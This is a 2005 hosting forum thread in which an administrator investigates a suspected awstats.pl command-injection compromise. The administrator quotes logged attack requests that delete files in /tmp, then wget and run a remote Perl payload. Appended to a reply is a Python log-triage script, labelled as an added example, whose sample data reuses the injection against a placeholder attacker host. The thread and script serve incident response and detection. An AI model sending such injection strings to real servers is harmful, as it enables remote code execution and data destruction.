The Community Forums


awstats zbind exploit / urgent!!! critical

Discussion in 'Bind / DNS / Nameserver Issues' started by IPSecureNetwork, Jul 3, 2005.

  1. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    I was surprised when today I looked at the processes on the server: I found a process called zbind, and I investigated and found
    the zbind exploit. This exploit affected awstats. Please update the program or tell me what I can do to update my awstats and fix this. Thanks, this is URGENT.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Can you be a little clearer on this? That exploit is very common and can be installed by a whole variety of means (usually a phpBB or phpNuke installation). What was the file ownership of the exploit file(s)? If it was nobody:nobody and you are running with SUEXEC enabled, then it's not likely to have been an awstats.pl compromise, as Perl scripts will be running under the username and group of the account. It's more likely that you haven't upgraded all your phpBB installations to v2.0.16.
     
  3. IPSecureNetwork

    IPSecureNetwork Well-Known Member

    Joined:
    May 28, 2005
    Messages:
    99
    Likes Received:
    0
    Trophy Points:
    6
    More about the problem with awstats:

    mod_security can stop some of the attackers, but one of the codes
    could get past the mod_security control.

    Look:

    211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.115 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
    211.51.139.133 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.pulameasuxtefute.com/sess_3539283e27d73cae29fe2b80f9293f59;perl%20sess_3539283e27d73cae29fe2b80f9293f59;echo%20;echo| HTTP/1.1 200.123.181.114 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
    Access denied with code 406. Pattern match "/~nobody" at THE_REQUEST

    Those are some of the codes used by the attackers.
    But I don't know if awstats has a new bug. I think that is the problem: a new bug in the code execution in awstats.pl.

    I post here the mail sent by the server to me:

    Note: If this is the first time you received this mail, it contains the history for the entire month so far.

    Below are the recently uploaded scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

    /home/demo/public_html/lndex.php:128: ";
    /home/demo/public_html/lndex.php:129: mail($adminEmail,"PHP Shell Warning - Unauthorized Access",$warnMsg,
    /home/demo/public_html/lndex.php:130: "From: $fromEmail\nX-Mailer:$THEVersion AutoWarn System"

    After this I deleted the demo account, and I found the zbind process and killed it.
     
  4. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    But those were unsuccessful attempts at running awstats.pl and provide no proof at all that it could have been through awstats.pl that they gained access. Did you see my comments about the file ownerships? You need to post the entries that actually show the successful compromise before you can start blaming awstats.pl.
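    The point made above, that a request refused with 406 is an attempt and not a compromise, can be turned into a triage script. The following is an added example, not code from the thread or from cPanel: it parses log lines in the shape quoted earlier (client, date, time, `(null)`, request, protocol, server, optional mod_security message, HTTP status; the field layout is inferred from those quoted lines and is an assumption), decodes the `configdir` parameter sent to awstats.pl, flags values containing shell metacharacters, and reports a line as worth investigating only when the injection shape is present and the server did not refuse it. The sample log lines, hostnames and payload file name below are constructed placeholders modelled on the quoted lines.

```python
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the mod_security output quoted in the thread.
# Hosts and the payload name are placeholders. Line 1 was refused (406), line 2 is
# the same request answered with 200, line 3 is a normal awstats report request.
SAMPLE_LOG = """\
203.0.113.7 2005-06-27 20:25:11 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20attacker.example/s;perl%20s;echo%20;echo| HTTP/1.1 198.51.100.5 Access denied with code 406. Pattern match "wget " at THE_REQUEST. 406
203.0.113.7 2005-06-27 20:26:40 (null) /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;wget%20attacker.example/s;perl%20s;echo%20;echo| HTTP/1.1 198.51.100.5 200
203.0.113.9 2005-06-27 20:30:02 (null) /awstats/awstats.pl?config=demo&output=main HTTP/1.1 198.51.100.5 200
"""

# Assumed field layout, taken from the quoted lines: the request path carries no
# literal spaces (they are %20-encoded), so a \S+ capture is safe for it.
LINE_RE = re.compile(
    r"^(?P<client>\S+) (?P<date>\S+) (?P<time>\S+) \S+ (?P<request>\S+) HTTP/\d\.\d "
    r"(?P<server>\S+) (?P<message>.*?)(?P<status>\d{3})$"
)

# Shell metacharacters that never belong in an awstats config/configdir value.
SHELL_META_RE = re.compile(r"[|;`&$<>]")


def parse_query(request):
    """Split the query string on '&' only; a ';' here is payload, not a separator."""
    _, _, query = request.partition("?")
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def triage_line(line):
    """Classify one log line as clean, blocked (refused by mod_security) or investigate."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    params = parse_query(m["request"])
    suspicious = {k: v for k, v in params.items() if SHELL_META_RE.search(v)}
    blocked = m["status"] == "406" or "Access denied" in m["message"]
    if not suspicious:
        verdict = "clean"
    elif blocked:
        verdict = "blocked"       # refused: an attempt, not evidence of compromise
    else:
        verdict = "investigate"   # injection shape AND the server answered it
    return {
        "client": m["client"],
        "when": f"{m['date']} {m['time']}",
        "status": int(m["status"]),
        "suspicious": suspicious,
        "verdict": verdict,
    }


def triage(log_text):
    """Triage every parseable line of a log; unparseable lines are skipped."""
    results = [triage_line(line) for line in log_text.splitlines()]
    return [r for r in results if r is not None]


def needs_investigation(log_text):
    """Only the lines that could actually have executed something."""
    return [r for r in triage(log_text) if r["verdict"] == "investigate"]


if __name__ == "__main__":
    for r in triage(SAMPLE_LOG):
        print(r["when"], r["client"], r["status"], r["verdict"], sorted(r["suspicious"]))
```

    Run against a real mod_security or access log, the `investigate` list is the set of entries to correlate with the ownership and timestamps of the dropped files; the `blocked` list is noise for that purpose, however alarming the decoded payload looks.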
     